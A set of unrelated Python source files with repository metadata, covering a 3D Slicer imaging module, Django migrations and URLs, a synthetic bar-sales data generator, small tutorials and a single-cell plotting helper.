((min_v[0], min_v[1], min_v[2] - depth), (max_v[0], max_v[1], min_v[2] - depth),
(max_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2] - depth), (min_v[0], min_v[1], min_v[2] - depth),
(min_v[0], min_v[1], min_v[2])),
((max_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
((max_v[0], max_v[1], min_v[2] - depth), (max_v[0], min_v[1], min_v[2] - depth),
(max_v[0], min_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth),
(min_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth),
(min_v[0], max_v[1], min_v[2] - depth))))
vertices = np.append(table, vertices, axis=0)
max_v = np.max(np.max(vertices, axis=0), axis=0)
min_v = np.min(np.min(vertices, axis=0), axis=0)
center = (max_v - min_v) / 2 + min_v
vertices -= center
# Convert to Float
sendArray = np.append(np.append(np.asarray((-2., 0.)), center), np.ndarray.flatten(vertices))
for s in self.socketReceiveSend:
s.send(str(sendArray.tolist()).encode())
# Wait for bb to be applied
for s in self.socketReceiveSend:
s.recv(102400)
@staticmethod
def isValidInputOutputData(inputVolumeNode, outputModel, targetNode):
"""Validates if the output is not the same as input
"""
if not inputVolumeNode:
logging.debug('isValidInputOutputData failed: no input volume node defined')
return False
if not outputModel:
logging.debug('isValidInputOutputData failed: no output volume node defined')
return False
if not targetNode:
logging.debug('isValidInputOutputData failed: no target node defined')
return False
return True
def waypoint(self, percentageDone=None, log=None):
if log:
logging.info(log)
if self.updateCallback:
self.updateCallback(percentageDone)
if self.cancel:
self.cancel = False
return True
return False
def cleanUp(self):
if self.segmentationNode is not None:
slicer.mrmlScene.RemoveNode(self.segmentationNode)
def initSegmentationNode(self, inputVolume):
self.segmentationNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentationNode")
self.segmentationNode.SetReferenceImageGeometryParameterFromVolumeNode(inputVolume)
addedSegmentID = self.segmentationNode.GetSegmentation().AddEmptySegment("skin")
segmentEditorWidget = slicer.qMRMLSegmentEditorWidget()
segmentEditorWidget.setMRMLScene(slicer.mrmlScene)
segmentEditorNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentEditorNode")
segmentEditorWidget.setMRMLSegmentEditorNode(segmentEditorNode)
segmentEditorWidget.setSegmentationNode(self.segmentationNode)
segmentEditorWidget.setMasterVolumeNode(inputVolume)
return addedSegmentID, segmentEditorWidget, segmentEditorNode
def applyThresholding(self, segmentEditorWidget, inputVolume):
rangeHU = inputVolume.GetImageData().GetScalarRange()
# Thresholding
segmentEditorWidget.setActiveEffectByName("Threshold")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("MinimumThreshold", self.imageThreshold)
effect.setParameter("MaximumThreshold", rangeHU[1])
effect.self().onApply()
def applyLargestIsland(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Islands")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("Operation", "KEEP_LARGEST_ISLAND")
effect.setParameter("MinimumSize", 1000)
effect.self().onApply()
def applySmoothing(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Smoothing")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("SmoothingMethod", "CLOSING")
effect.setParameter("KernelSizeMm", 10)
effect.self().onApply()
def applyInverting(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Logical operators")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("Operation", "INVERT")
effect.self().onApply()
def calcDensityInThread(logic: BestPathVisualizationLogic, indices: list, insideTransformed: np.ndarray):
indices_per_process = int(np.ceil(len(indices) / cpu_count()))
sent = 0
processes = []
original_stdin = sys.stdin
sys.stdin = open(os.devnull)
try:
for _ in range(cpu_count()):
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
q = Queue()
p = Process(target=calcDensityImpl, args=(
q, logic.targetPoint, logic.arrShape, insideTransformed[sent:local_sent, :], indices[sent:local_sent],
logic.imageThreshold, logic.globalMaxDensity, logic.inputVolumeNPArray, logic.overlayTypeIndex,
logic.spacing))
sent = local_sent
p.start()
processes.append((q, p))
sent = 0
for q, p in processes:
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
np.asarray(logic.scalarData)[indices[sent:local_sent]] = q.get()
p.join()
sent = local_sent
finally:
sys.stdin.close()
sys.stdin = original_stdin
return True
def calcDensityImpl(q: Queue, targetPoint: np.ndarray, arrShape: np.ndarray, insideTransformed: np.ndarray,
indices: list, imageThreshold: float,
globalMaxDensity: float, inputVolumeNPArray: np.ndarray, overlayTypeIndex: int,
spacing: np.ndarray):
densities = np.zeros((len(indices)))
for dispIdx in range(len(indices)):
densities[dispIdx] = overlay.calcDensity(targetPoint, arrShape, insideTransformed[dispIdx], indices[dispIdx],
imageThreshold, globalMaxDensity, inputVolumeNPArray, overlayTypeIndex,
spacing)
q.put(densities)
def executeInPeices(function, indices, outArray):
indices_per_process = int(np.ceil(len(indices) / cpu_count()))
sent = 0
processes = []
original_stdin = sys.stdin
sys.stdin = open(os.devnull)
try:
for _ in range(cpu_count()):
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
q = Queue()
p = Process(target=function,
args=(q, indices[sent:local_sent], sent))
sent = local_sent
p.start()
processes.append((q, p))
sent = 0
for q, p in processes:
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
outArray[indices[sent:local_sent]] = q.get()
p.join()
sent = local_sent
finally:
sys.stdin.close()
sys.stdin = original_stdin
|
[
"stefan.gerlach@tuhh.de"
] |
stefan.gerlach@tuhh.de
|
99efab2a162ffa1089de10df2b63c489eb0dbd71
|
48c9af57aa1956d15b7335ea88dfbd44333c3998
|
/df_project_generate/__init__.py
|
d2d8463aa3df2da968f70d43fa907d725e4d6949
|
[] |
no_license
|
darfat/skp-jabar
|
eaf23685948fd6efd0604ef3a554b58a1cdd8bab
|
30861ae8eb1f37d1b3832043f297515f1a98b2e8
|
refs/heads/master
| 2021-01-22T13:12:16.658917
| 2014-10-06T09:11:54
| 2014-10-06T09:11:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 974
|
py
|
##############################################################################
#
# Darmawan Fatriananda
# BKD Pemprov Jabar
# Copyright (c) 2014 <http://www.asdarfat.wordpress.com.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import wizard
|
[
"darmawan.jtk04@gmail.com"
] |
darmawan.jtk04@gmail.com
|
ae30769610e5c080ac853d5fd9ad989664a4ac12
|
260aa7c38bfbae2bf7bdc17ab4e178f93bd60ec6
|
/week8/Simple Project/blog/migrations/0001_initial.py
|
781ab23cd2d83f79a2b17f7edffbccb747435a06
|
[] |
no_license
|
Orik236/Web_Orka236
|
0fe177febe193821f62cf3687865a11799662e13
|
49ddf61de35213be490b4aa08ad041231fe584e7
|
refs/heads/master
| 2023-01-09T22:22:40.846945
| 2020-04-16T22:47:38
| 2020-04-16T22:47:38
| 247,916,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,048
|
py
|
# Generated by Django 2.2.11 on 2020-03-16 18:07
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=datetime.datetime(2020, 3, 16, 18, 7, 32, 353192, tzinfo=utc))),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"orik236@gmail.com"
] |
orik236@gmail.com
|
16646a3eed6770bf209dba69949d33c6bcd46b9e
|
f71601a72f5fe57b8e21f71093dde06bf30d609d
|
/coding_solutions/Day16(3-06-2020)/PrimeInterval.py
|
18446d9453565051fb5e83b99cd3d6c22745d631
|
[] |
no_license
|
alvas-education-foundation/Dhanya-bhat
|
eb812fdd6ae28bf45d9db3d1f691f0abc2ef926e
|
aadf27ca7ed0832e215db1938201bb3896df327b
|
refs/heads/master
| 2022-12-02T07:59:01.386373
| 2020-08-10T13:11:50
| 2020-08-10T13:11:50
| 265,844,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
l = int(input("Enter start point: "))
u = int(input("Enter end point: "))
for num in range(l,u + 1):
if num > 1:
for i in range(2,num):
if (num % i) == 0:
break
else:
print(num)
|
[
"dhanyabhat29@gmail.com"
] |
dhanyabhat29@gmail.com
|
730e91b4e0c6f30bc58e9e97cc1c8d759cb3c311
|
3cc416df0c4697aa0f2dffb4d94e89f5cb62ec0e
|
/api/hypem/urls.py
|
baef22a54a09b3ed3a47056df93c2fb6c183a468
|
[] |
no_license
|
guess/hypem
|
308ed022839e603056467ac9bff36b33cef438a5
|
028aaec7007fdf9d0f593cac463b7a5cd91b36b1
|
refs/heads/master
| 2016-09-10T14:33:04.402081
| 2015-03-07T20:21:41
| 2015-03-07T20:21:41
| 31,442,249
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 227
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^(\w+)/(\w+)/(\d+)', 'hypem.views.home', name='home'),
)
|
[
"stevetsourounis@gmail.com"
] |
stevetsourounis@gmail.com
|
2e9bb71c6257e2923c9b3b65dbe3d1d47201c11e
|
795f88819c160f32c346e9698501957fa08cb743
|
/dataGenerator/dataGenerator.py
|
c2a6d8ae1256deca034ab146eeee2aeefe47c2e1
|
[
"MIT"
] |
permissive
|
GwennaelBuchet/zenibar
|
367c9526c4cb447c5eb28ec7bd95e5f8be575213
|
ea7c8bcb287377ff416a80b477bce00b4edd63ad
|
refs/heads/master
| 2021-09-05T05:29:27.734597
| 2018-01-24T12:10:29
| 2018-01-24T12:10:29
| 115,437,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,367
|
py
|
from datetime import datetime as _dt
from datetime import date as _date
from datetime import timedelta as _td
import math
import random
import json
class Beer:
def __init__(self, id, brand, model, strongness, style, color, origin, price):
self.id = id
self.brand = brand
self.model = model
self.strongness = strongness
self.style = style
self.color = color
self.origin = origin
self.rank = 0
self.price = price
self.stock = 0
def canMatch(self, conditions):
for condition in conditions:
if eval("self." + condition) == False:
return False
return True
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class Customer:
"""Un client et son historique"""
def __init__(self, id, firstname, lastname,
registrationDate, lastvisitDate,
averageUptakesPerDay, habits, ponderationDays, amount):
self.id = id
self.firstname = firstname
self.lastname = lastname
self.registrationYear = registrationDate.year
self.registrationMonth = registrationDate.month
self.registrationDay = registrationDate.day
self.registrationDate = registrationDate
self.lastvisitYear = lastvisitDate.year
self.lastvisitMonth = lastvisitDate.month
self.lastvisitDay = lastvisitDate.day
self.lastvisitDate = lastvisitDate
self.averageUptakesPerDay = averageUptakesPerDay
self.habits = habits
# beers that fit the habits/preferences of this customer
self.suitableBeers = []
self.uptakes = []
# ponderationDays correspond tho the percents of chance the customer will go to the bar for each day of the week
self.ponderationDays = ponderationDays
self.amount = amount
@staticmethod
def generateName(indice):
namesList = [["Adrien", "Legrand"], ["Gwennael", "Buchet"], ["Marcel", "Beliveau"], ["Sasha", "Foxxx"],
["Jenna", "Haze"], ["Riley", "Reid"], ["Kobe", "Tai"], ["Daisie", "Marie"], ["Lisa", "Ann"],
["Tori", "Black"], ["Jannice", "Griffith"], ["Emilie", "Grey"], ["Mia", "Khalifa"],
["Cassidy", "Banks"], ["Régine", "Zylberberg"], ["Nikita", "Bellucci"]]
firstnames = ["Amber", "Andy", "Natasha", "Sandy", "Aurora", "Susie", "Cathy", "Clara", "Coralie", "Erika",
"Estelle", "Jenna", "Kelly", "Teri", "Shannon", "Jasmin", "Stormy", "Dolly", "Gina", "Heather",
"Julia", "Marilyn", "Olivia", "Vanessa", "Nikita", "Brigitte"]
lastnames = ["Labouche", "Storm", "Doll", "Lynn", "Vega", "Lord", "Kitty", "Angel", "Amor", "Dee", "Pecheresse",
"King", "Young", "Love", "Star", "Tits", "Moon", "Tekila", "Coco", "Shave", "Canelle", "Chocolat",
"Barbie", "Ladyboy", "Queer", "Dior", "Stone", "Kass", "Pink"]
if indice < len(namesList):
return namesList[indice]
firstname = firstnames[math.ceil(random.random() * len(firstnames)) - 1]
lastname = lastnames[(indice - len(namesList) - 1) % len(lastnames)]
return [firstname, lastname]
@staticmethod
def generateFirstDate():
delta = _td(math.ceil(random.random() * 60))
return OPENING_DATE + delta
@staticmethod
def generateLastDate():
delta = _td(math.ceil(random.random() * 30))
return LAST_DATE - delta
@staticmethod
def generateAverageUptakes():
return 1 + math.ceil(random.random() * 5)
@staticmethod
def generatePonderations():
ponderations = []
ponderations.append(random.random() / 5) # monday
ponderations.append(0.2 + random.random() / 3.5) # tuesday
ponderations.append(0.2 + random.random() / 3) # wednesday
ponderations.append(0.3 + random.random() / 2) # thursday
ponderations.append(0.35 + random.random() / 2) # friday
ponderations.append(0.66 + random.random() / 3) # saturday
ponderations.append(0) # sunday. Bar is closed
return ponderations
@staticmethod
def generateHabits():
habits = []
# strongness
strongness = round(4 + random.random() * 5, 1)
strongnessSign = "<" if math.copysign(1, -1 + random.random() * 2) < 0 else ">"
if strongness <= 6:
strongnessSign = ">"
if strongness >= 9:
strongnessSign = "<"
habits.append("strongness" + strongnessSign + str(strongness))
# style
allStyles = ["'IPA'", "'Amber'", "'Belgian Pale Ale'", "'Belgian Dark Ale'", "'Lager'", "'Abbaye'", "'White'",
"'Alcool Free'", "'Extra Special Bitter'"]
selectedStyles = []
for s in allStyles:
if random.random() < 0.5:
selectedStyles.append(s)
style = "style in [" + ", ".join(selectedStyles)
style += "]"
habits.append(style)
# color
allColors = ["'White'", "'Blond'", "'Amber'", "'Brown'", "'Black'"]
selectedColors = []
for i, c in enumerate(allColors):
if random.random() < 0.5:
selectedColors.append(c)
color = "color in [" + ", ".join(selectedColors)
color += "]"
habits.append(color)
return habits
@staticmethod
def generateAmount():
return math.ceil(36 + random.random() * 40)
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class Uptake:
def __init__(self, customerId, beersId):
self.customerId = customerId
self.beersId = beersId
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class DailyUptakes:
"""History of uptakes for 1 day"""
def __init__(self, weather, singleDateTime):
self.weather = weather
self.year = singleDateTime.year
self.month = singleDateTime.month
self.day = singleDateTime.day
self.uptakes = []
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class CustomerDailyUptakes:
"""Une consommation par le client"""
def __init__(self, singleDateTime, beersId):
self.year = singleDateTime.year
self.month = singleDateTime.month
self.day = singleDateTime.day
self.beersId = beersId
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
class Bar:
def __init__(self, beers, customers):
self.dailyUptakes = []
self.beers = beers
self.customers = []
self.nbTotalUptakes = 0
for customer in customers:
self.addCustomer(customer)
def addCustomer(self, customer):
self.addSuitableBeersToCustomer(customer)
while len(customer.suitableBeers) == 0:
customer.habits = Customer.generateHabits()
self.addSuitableBeersToCustomer(customer)
self.customers.append(customer)
def addBeer(self, beer):
self.addSuitableBeerToCustomers(beer)
self.beers.append(beer)
def addSuitableBeersToCustomer(self, customer):
""" Try to find beers in this bar which can fit customer's habits """
for beer in self.beers:
if beer.canMatch(customer.habits):
customer.suitableBeers.append(beer)
customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)
def addSuitableBeerToCustomers(self, beer):
""" Try to find customers who can like this beer """
for customer in self.customers:
if beer.canMatch(customer.habits):
customer.suitableBeers.append(beer)
customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)
def _try(self, o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
separators=(',', ':')).replace(
'\n', '')
class Weather:
def __init__(self, temperature, humidity):
self.temperature = temperature
self.humidity = humidity
def _try(o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: _try(o), sort_keys=True, indent=0, separators=(',', ':')).replace(
'\n', '')
def generateBeers():
beers = [Beer(1, "Kasteel", "Triple", 11, "Belgian Pale Ale", "Blonde", "Belgium", 6),
Beer(2, "La Raoul", "", 6.5, "Lager", "Blond", "France", 3.6),
Beer(3, "Rochefort", "8", 9.2, "Abbaye", "Brown", "Belgium", 5.5),
Beer(4, "Bière du Corbeau", "", 9, "Belgian Pale Ale", "Blond", "Belgium", 5),
Beer(5, "Cuvée des Trolls", "Blonde", 7, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
Beer(6, "Orval", "Blonde", 7, "Abbaye", "Amber", "Belgium", 5),
Beer(7, "Brewdog", "Punk IPA", 5.6, "IPA", "Blond", "Scotland", 4.5),
Beer(8, "Westmalle", "Triple", 9.5, "Abbaye", "Blond", "Belgium", 5),
Beer(9, "Rince Cochon", "Blonde", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
Beer(10, "Hinano", "", 5, "Lager", "Blond", "Polynesia", 4),
Beer(11, "La Levrette", "Blonde", 5, "Lager", "Blond", "France", 4.5),
Beer(12, "La Fée Torchette", "Blonde", 6.5, "Lager", "Blond", "France", 4.5),
Beer(13, "La Trappe", "Quadrupel", 10, "Belgian Pale Ale", "Amber", "Belgium", 5),
Beer(14, "Kwak", "", 8.4, "Belgian Pale Ale", "Amber", "Belgium", 5.5),
Beer(15, "Tripel Karmeliet", "", 8.4, "Belgian Pale Ale", "Blond", "Belgium", 5.3),
Beer(16, "Omnipollo", "Fatamorgana", 8, "IPA", "Amber", "Sweden", 6.5),
Beer(17, "Barbar", "Miel", 8, "Belgian Pale Ale", "Blond", "Belgium", 6.4),
Beer(18, "Iron Maiden", "Trooper", 4.7, "Extra Special Bitter", "Blond", "England", 4.6),
Beer(19, "Gulden", "Draak", 10.7, "Belgian Dark Ale", "Brown", "Belgium", 5.8),
Beer(20, "Delirium", "Tremens", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 5.4),
Beer(21, "Chimay", "Bleue", 9, "Belgian Dark Ale", "Brown", "Belgium", 5.4),
Beer(22, "Angelus", "Blonde", 7, "Belgian Pale Ale", "Blond", "France", 4.8),
Beer(23, "Pietra", "", 6, "Lager", "Blond", "France", 3.8),
Beer(24, "Brewdog", "Nanny State", 0.5, "Alcool Free", "Blond", "Scotland", 3.8),
Beer(25, "La Chouffe", "Blonde", 8, "Belgian Pale Ale", "Blond", "Belgium", 4.6),
Beer(26, "Blue Moon", "White Ale", 5.4, "White", "White", "USA", 4.5),
Beer(27, "Rousse du Mont Blanc", "", 6.5, "Amber", "Amber", "France", 3.6),
Beer(28, "Rochefort", "10", 11.3, "Abbaye", "Brown", "Belgium", 6),
Beer(29, "Saint Bernardus", "Abt 12", 10, "Belgian Pale Ale", "Brown", "Belgium", 5)
]
return beers
def generateCustomers():
customers = []
for i in range(0, NB_CUSTOMERS):
name = Customer.generateName(i)
firstDate = Customer.generateFirstDate()
lastDate = Customer.generateLastDate()
averageUptakesPerDay = Customer.generateAverageUptakes()
habits = Customer.generateHabits()
amount = Customer.generateAmount()
ponderationDays = Customer.generatePonderations()
customers.append(
Customer(i, name[0], name[1], firstDate, lastDate, averageUptakesPerDay, habits, ponderationDays, amount)
)
return customers
def getTempetatureFactor(temperature):
if temperature < 5:
return 0.85
if temperature > 22:
return 2 - (22 / temperature) # [1.04 ; 1.35]
return 1
def getHumidityFactor(humidity):
if humidity < 0.7:
return 1.2
if humidity > 0.9:
return 0.8
return 1
def willCustomerComeThisDay(customer, weather, singleDateTime):
# dayPonderation = percent of chance the customer goes to the bar today
# get standard ponderation for this customer for today
chancesHeWillComeToday = customer.ponderationDays[singleDateTime.weekday()]
# let's add some random to our ponderation, between -0.2 and + 0.2
# dayPonderation += (-0.2 + math.ceil(random.random() * 0.4))
# dayPonderation = max(0, min(1, dayPonderation)) # just to ensure to get in [0, 1] only
# moderate ponderation with weather
chancesHeWillComeToday *= getTempetatureFactor(weather.temperature) # 0.85 ; 1 ; [1.04 ; 1.35]
chancesHeWillComeToday *= getHumidityFactor(weather.humidity) # 1.2 ; 1 ; 0.8
# random=[0.0, 1.0], so it's convenient to compare with chances the customer will come today
return random.random() < chancesHeWillComeToday
def generateUptakesFor1Customer(customer, weather, singleDateTime):
""" Generates all the uptakes of a customer, based on its habits """
if not willCustomerComeThisDay(customer, weather, singleDateTime):
return None
# generates a random number of uptakes, based on the user habits
nbUptakes = max(0, customer.averageUptakesPerDay + (-1 + math.ceil(random.random() * 2)))
# The further we are in the month, the lower money the customer have :/
nbUptakes *= round(math.sin(0.03 * singleDateTime.day + math.pi / 2), 4) # [1; 0.6]
nbSuitableBeers = len(customer.suitableBeers)
if nbSuitableBeers == 0:
return None
beers = []
while nbUptakes > 0:
# find a suitable beer for the customer
beer = customer.suitableBeers[math.ceil(random.random() * (nbSuitableBeers - 1))]
beers.append(beer.id)
nbUptakes = nbUptakes - 1
return Uptake(customer.id, beers)
def generateWeather(singleDateTime, averageHumidityPerMonth):
""" Generates aweather condition, based on the date """
currentAverage = averageHumidityPerMonth[singleDateTime.month - 1]
r = random.random()
h = round(currentAverage + (r / 10), 2)
t = math.ceil(-10 + ((1 - currentAverage) * (50 + 25 * r)))
return Weather(t, h)
def dateRange(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + _td(n)
def lastDay():
today = _dt.now()
snowCampDay = _dt(2018, 1, 25)
if snowCampDay < today:
return today
return snowCampDay
def generateMonthsHumidity():
averageHumidityPerMonth = []
for m in range(0, 12):
averageHumidityPerMonth.append(math.fabs(math.sin((-6 + m) / 12)) + 0.4) # to get values between 0.4 and 1
return averageHumidityPerMonth
def generateData():
endDay = lastDay()
customers = generateCustomers()
beers = generateBeers()
bar = Bar(beers, customers)
# pre-compute an average humidity per month to speed-up computation of the weather conditions per day
averageHumidityPerMonth = generateMonthsHumidity()
# fill in each day from the opening of the bar with uptakes
for singleDateTime in dateRange(OPENING_DATE, endDay):
weather = generateWeather(singleDateTime, averageHumidityPerMonth)
dailyUptakes = DailyUptakes(weather, singleDateTime)
for customer in bar.customers:
if customer.registrationDate <= singleDateTime and customer.lastvisitDate >= singleDateTime:
uptakes = generateUptakesFor1Customer(customer, weather, singleDateTime)
if uptakes != None:
dailyUptakes.uptakes.append(uptakes)
customerUptakes = CustomerDailyUptakes(singleDateTime, uptakes.beersId)
customer.uptakes.append(customerUptakes)
bar.nbTotalUptakes += len(uptakes.beersId)
bar.dailyUptakes.append(dailyUptakes)
return bar
##############################################################################
NB_CUSTOMERS = 50
OPENING_DATE = _dt(2012, 1, 1)
LAST_DATE = lastDay()
monthPonderations = [7, 8, 8.5, 9, 10, 10, 8.5, 6.5, 10, 10, 10, 6]
""" Start data generation """
bar = generateData()
with open('./zenibar_history.json', 'w+') as fu:
fu.write(bar.to_JSON())
print(bar.nbTotalUptakes)
|
[
"gwennael.buchet@gmail.com"
] |
gwennael.buchet@gmail.com
|
93c947a317a1de8748f771cbb780924f92ae327a
|
ece7df4bc7425be27a55dc74f64c8d360454efb0
|
/01_functions_are_objects.py
|
6f911c0b6382b7a4a403190bc6a9b42f008389d6
|
[] |
no_license
|
zacniewski/Decorators_intro
|
81321334fbce5638e0735e3c59a767bac3bd2d5a
|
e51a9ebcedcea29ac18d075747bd16a047c7af05
|
refs/heads/master
| 2021-01-14T11:25:34.143649
| 2014-01-02T10:54:08
| 2014-01-02T10:54:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 678
|
py
|
def shout(word="yes"):
return word.capitalize()+"!"
print shout()
# outputs : 'Yes!'
# As an object, you can assign the function to a variable like any
# other object
scream = shout
# Notice we don't use parentheses: we are not calling the function, we are
# putting the function "shout" into the variable "scream".
# It means you can then call "shout" from "scream":
print scream()
# outputs : 'Yes!'
# More than that, it means you can remove the old name 'shout', and
# the function will still be accessible from 'scream'
del shout
try:
print shout()
except NameError, e:
print e
#outputs: "name 'shout' is not defined"
print scream()
# outputs: 'Yes!'
|
[
"a.zacniewski@gmail.com"
] |
a.zacniewski@gmail.com
|
3d07ff6fbbfb99a178b400de391131d5e603ea46
|
f389fb4ffdbdd71c108559ecbd269304706ef7c3
|
/tutorial3/tutorial3.py
|
c287234fad183ee5484e4dd94c18c31289128b2f
|
[] |
no_license
|
petrLorenc/School-web-data-mining-tutorials
|
a04176add4cde37a0fec4d24f050d2169af52a18
|
d3d0c0a9e6945ac08fdd8f0b36661b9023ade044
|
refs/heads/master
| 2021-01-21T12:01:37.023238
| 2017-05-19T06:25:46
| 2017-05-19T06:25:46
| 91,772,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
import nltk
import networkx
# input text
text = None
with open('text.txt', 'r') as f:
text = f.read()
# process text and convert to a graph
sentences = [[t for t in nltk.word_tokenize(sentence)] for sentence in nltk.sent_tokenize(text)]
G=nx.Graph()
# G.add_node(...
# G.add_edge(...
# ...
# visualise
plt.figure(figsize=(20,10))
pos = graphviz_layout(G, prog="fdp")
nx.draw(G, pos,
labels={v:str(v) for v in G},
cmap = plt.get_cmap("bwr"),
node_color=[G.degree(v) for v in G],
font_size=12
)
plt.show()
# write to GEXF
nx.write_gexf(G, "export.gexf")
|
[
"petr.lorenc@firma.seznam.cz"
] |
petr.lorenc@firma.seznam.cz
|
b8f08a33fc0e8b8ddaecb9b9c29a5e20c4da5e32
|
047a9613723e6477e68624cb9c3aeb08bc1d4c8a
|
/src/_plotter.py
|
ab49aa83c46f2b322db46519f364eb23f4f35037
|
[
"MIT"
] |
permissive
|
phoenixding/cellar
|
512ca1c8fe580081b49ceadf7dfa81648739658d
|
4736b207e2b40a135f88cc2e677af620ea5ef20d
|
refs/heads/master
| 2023-02-22T05:42:30.902617
| 2021-01-31T16:39:20
| 2021-01-31T16:39:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,346
|
py
|
from typing import Optional, Union
import numpy as np
import plotly.express as px
from plotly.graph_objects import Figure
from anndata import AnnData
from .units import wrap
from . import reduce_dim_vis
from . import name_genes
COLORS = [
'#cc5151', '#51cccc', '#337f7f', '#8ecc51', '#7f3333', '#597f33', '#8e51cc',
'#59337f', '#ccad51', '#7f6c33', '#51cc70', '#337f46', '#5170cc', '#33467f',
'#cc51ad', '#7f336c', '#cc7f51', '#7f4f33', '#bccc51', '#757f33', '#60cc51',
'#3c7f33', '#51cc9e', '#337f62', '#519ecc', '#33627f', '#6051cc', '#3c337f'
]
def _find_gene_index(adata, gene):
if isinstance(gene, int):
if gene > adata.var.index.to_numpy().shape[0]:
raise ValueError("Index out of bounds.")
return gene
if not isinstance(gene, str):
raise ValueError("Incorrect gene format.")
if gene in adata.var.index.to_numpy():
return np.where(adata.var.index.to_numpy() == gene)[0]
if 'parsed_names' not in adata.var:
name_genes(adata)
if gene in adata.var['parsed_names'].to_numpy():
return np.where(adata.var['parsed_names'] == gene)[0]
if gene in adata.var['parsed_ids'].to_numpy():
return np.where(adata.var['parsed_ids'] == gene)[0]
return -1
def _plot_labels(
adata: AnnData,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
has_labels = True
if 'labels' not in adata.obs:
has_labels = False
print("Labels not found. Plotting 2d embeddings.")
#raise ValueError("Labels not found in object.")
if 'x_emb_2d' not in adata.obsm:
print("2d embeddings not found.")
print("Running default visualization method.")
reduce_dim_vis(adata)
if has_labels:
color = adata.obs['labels'].to_numpy().astype(str)
method = adata.uns['visualization_info_2d']['method']
fig = px.scatter(
x=adata.obsm['x_emb_2d'][:, 0],
y=adata.obsm['x_emb_2d'][:, 1],
color=color if has_labels else None,
hover_data={'Cell': adata.obs.index.to_numpy()},
labels={
